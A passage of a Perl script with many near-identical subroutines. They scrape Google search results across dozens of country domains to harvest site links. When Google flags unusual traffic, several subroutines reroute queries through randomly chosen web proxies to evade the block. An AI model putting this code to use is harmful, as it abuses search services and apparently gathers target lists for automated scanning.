/ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $lobex[rand(scalar(@lobex))]; $jack5 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jack5.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack6() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jack6.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $lobex[rand(scalar(@lobex))]; $jack6 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jack6.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack7() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jack7.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $lobex[rand(scalar(@lobex))]; $jack7 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jack7.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack8() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jack8.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $lobex[rand(scalar(@lobex))]; $jack8 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jack8.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack9() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jack9.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $lobex[rand(scalar(@lobex))]; $jack9 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jack9.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack10() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jack10.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $lobex[rand(scalar(@lobex))]; $jack10 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jack10.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jackx1() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jackx1.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $random[rand(scalar(@random))]; $jackx1 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jackx1.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jackx2() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jackx2.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $random[rand(scalar(@random))]; $jackx2 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jackx2.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jackx3() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jackx3.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $random[rand(scalar(@random))]; $jackx3 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jackx3.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jackx4() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jackx4.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $random[rand(scalar(@random))]; $jackx4 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jackx4.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jackx5() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jackx5.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $random[rand(scalar(@random))]; $jackx5 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jackx5.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jackx6() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jackx6.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $random[rand(scalar(@random))]; $jackx6 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jackx6.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jackx7() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jackx7.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $random[rand(scalar(@random))]; $jackx7 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jackx7.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jackx8() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jackx8.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $random[rand(scalar(@random))]; $jackx8 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jackx8.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jackx9() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jackx9.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $random[rand(scalar(@random))]; $jackx9 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jackx9.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jackx10() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jackx10.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $random[rand(scalar(@random))]; $jackx10 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jackx10.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub google() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com/search?q=".uri_escape($key)."&num=100&filter=0&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub googleCA() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ca/search?q=".uri_escape($key)."&hl=&cr=countryCA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCA/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleDE() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.de/search?q=".uri_escape($key)."&hl=&cr=countryDE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleDE/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleUK() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.co.uk/search?q=".uri_escape($key)."&hl=&cr=countryUK&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleUK/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleFR() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.fr/search?q=".uri_escape($key)."&hl=&cr=countryFR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleFR/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleES() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.es/search?q=".uri_escape($key)."&hl=&cr=countryES&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleES/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleIT() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.it/search?q=".uri_escape($key)."&hl=&cr=countryIT&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleIT/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub googleNL() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.nl/search?q=".uri_escape($key)."&hl=&cr=countryNL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleNL/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleBE() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.be/search?q=".uri_escape($key)."&hl=&cr=countryBE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleBE/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleCH() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ch/search?q=".uri_escape($key)."&hl=&cr=countryCH&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCH/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub googleSE() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.se/search?q=".uri_escape($key)."&hl=&cr=countrySE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleSE/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleDK() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.dk/search?q=".uri_escape($key)."&hl=&cr=countryDK&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleDK/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleNO() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.no/search?q=".uri_escape($key)."&hl=&cr=countryNO&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleNO/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub googleNZ() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.co.nz/search?q=".uri_escape($key)."&hl=&cr=countryNZ&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleNZ/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleIE() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ie/search?q=".uri_escape($key)."&hl=&cr=countryIE&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleIE/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleBR() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.br/search?q=".uri_escape($key)."&hl=&cr=countryBR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub googleAR() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.ar/search?q=".uri_escape($key)."&hl=&cr=countryAR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleAR/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleCO() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.co/search?q=".uri_escape($key)."&hl=&cr=countryCO&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCO/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleCU() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.cu/search?q=".uri_escape($key)."&hl=&cr=countryCU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCU/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub googleCL() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.cl/search?q=".uri_escape($key)."&hl=&cr=countryCL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCL/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleMX() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.mx/search?q=".uri_escape($key)."&hl=&cr=countryMX&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleMX/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleAU() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.au/search?q=".uri_escape($key)."&hl=&cr=countryAU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleAU/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub googleRU() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.ru/search?q=".uri_escape($key)."&hl=&cr=countryRU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleRU/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleAT() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.at/search?q=".uri_escape($key)."&hl=&cr=countryAT&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleAT/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googlePL() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.pl/search?q=".uri_escape($key)."&hl=&cr=countryPL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlePL/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub googleIL() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.co.il/search?q=".uri_escape($key)."&hl=&cr=countryIL&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleIL/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleTR() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.tr/search?q=".uri_escape($key)."&hl=&cr=countryTR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleTR/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleUA() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.ua/search?q=".uri_escape($key)."&hl=&cr=countryUA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleUA/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub googleGR() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.gr/search?q=".uri_escape($key)."&hl=&cr=countryGR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleGR/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleJP() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.co.jp/search?q=".uri_escape($key)."&hl=&cr=countryJP&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleJP/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleCN() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.cn/search?q=".uri_escape($key)."&hl=&cr=countryCN&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCN/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub googleMY() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.my/search?q=".uri_escape($key)."&hl=&cr=countryMY&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleMY/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleTH() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.co.th/search?q=".uri_escape($key)."&hl=&cr=countryTH&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleTH/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleIN() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.co.in/search?q=".uri_escape($key)."&hl=&cr=countryIN&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleIN/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub googleKR() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.co.kr/search?q=".uri_escape($key)."&hl=&cr=countryKR&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleKR/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleRO() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ro/search?q=".uri_escape($key)."&hl=&cr=countryRO&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleRO/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleTW() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.com.tw/search?q=".uri_escape($key)."&hl=&cr=countryTW&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleTW/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sleep(1); sub googleZA() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.co.za/search?q=".uri_escape($key)."&hl=&cr=countryZA&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleZA/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googlePT() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.pt/search?q=".uri_escape($key)."&hl=&cr=countryPT&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlePT/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleCZ() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.cz/search?q=".uri_escape($key)."&hl=&cr=countryCZ&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleCZ/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleEU() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.eu/search?q=".uri_escape($key)."&hl=&cr=countryEU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleEU/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleHU() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.hu/search?q=".uri_escape($key)."&hl=&cr=countryHU&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleHU/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleID() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.co.id/search?q=".uri_escape($key)."&hl=&cr=countryID&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googleID/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googlePH() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ("http://www.google.ph/search?q=".uri_escape($key)."&hl=&cr=countryPH&as_qdr=&num=100&filter=&start=".$i."&sa=N"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /googlePH/){ my @grep = links($link); push(@list,@grep); } } } return @list; } sub googleSI() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = 